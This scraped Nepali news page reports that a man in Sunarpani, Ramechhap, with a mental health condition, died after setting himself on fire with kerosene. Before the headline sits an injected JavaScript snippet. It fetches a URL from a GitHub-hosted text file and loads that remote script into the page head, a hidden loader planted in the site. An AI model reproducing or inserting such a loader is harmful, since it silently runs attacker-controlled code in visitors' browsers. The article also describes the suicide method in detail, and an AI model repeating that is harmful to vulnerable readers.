;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनारपानीमा आफ्नै शरिरमा आगो लगाउदा जलेर भुजेलको मृत्यु – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • सुनारपानीमा आफ्नै शरिरमा आगो लगाउदा जलेर भुजेलको मृत्यु
दुर्घटना/अपराध

सुनारपानीमा आफ्नै शरिरमा आगो लगाउदा जलेर भुजेलको मृत्यु

चैत १४,

रामेछाप । रामेछापको मन्थलीमा आफ्नै शरिरमा आगो लगाएर शिरर जलाउदा एक जनाको ज्यान गएको छ । गत शुक्रबार दिनको करिब १ बजेको नगरपालिकाको वडा नं ५ सुनारपानीमा उनकै घरमा बसिरहेको समयमा मानसिक अवस्था ठिक नभएका अन्दाजी ४२/४३ वर्षीय हिरा बहादुर भुजेलले आफ्नै शरिरमा मट्टितेल ख्नाएर आगोलगाएका थिए ।

आगोबाट उनको शरिरको अगाडीको भाग जलेको छ । त्यस्तै पछाडीको भागपनि जलेको जिल्ला प्रहरी कार्यालय रामेछापका सूचना अधिकारी श्रीशंकर श्रेष्ठले जानकारी दिए ।

आगोबाट जलेका उनलाई स्थानीय र परिवारका अन्य सदस्यले उद्धार गरि उपचारको लागि मन्थली स्थित् तामाकोशी अस्पतालमा ल्याएको र उपचार हुन नसकी काठमाडौं रेफर गरिएकोमा उपचारको क्रममा किर्तिपुर अस्पतालमा ज्यान गएको प्रहरीले जनाएको छ ।संकेतिक तस्विर

 

फेसबुक प्रतिक्रियाहरु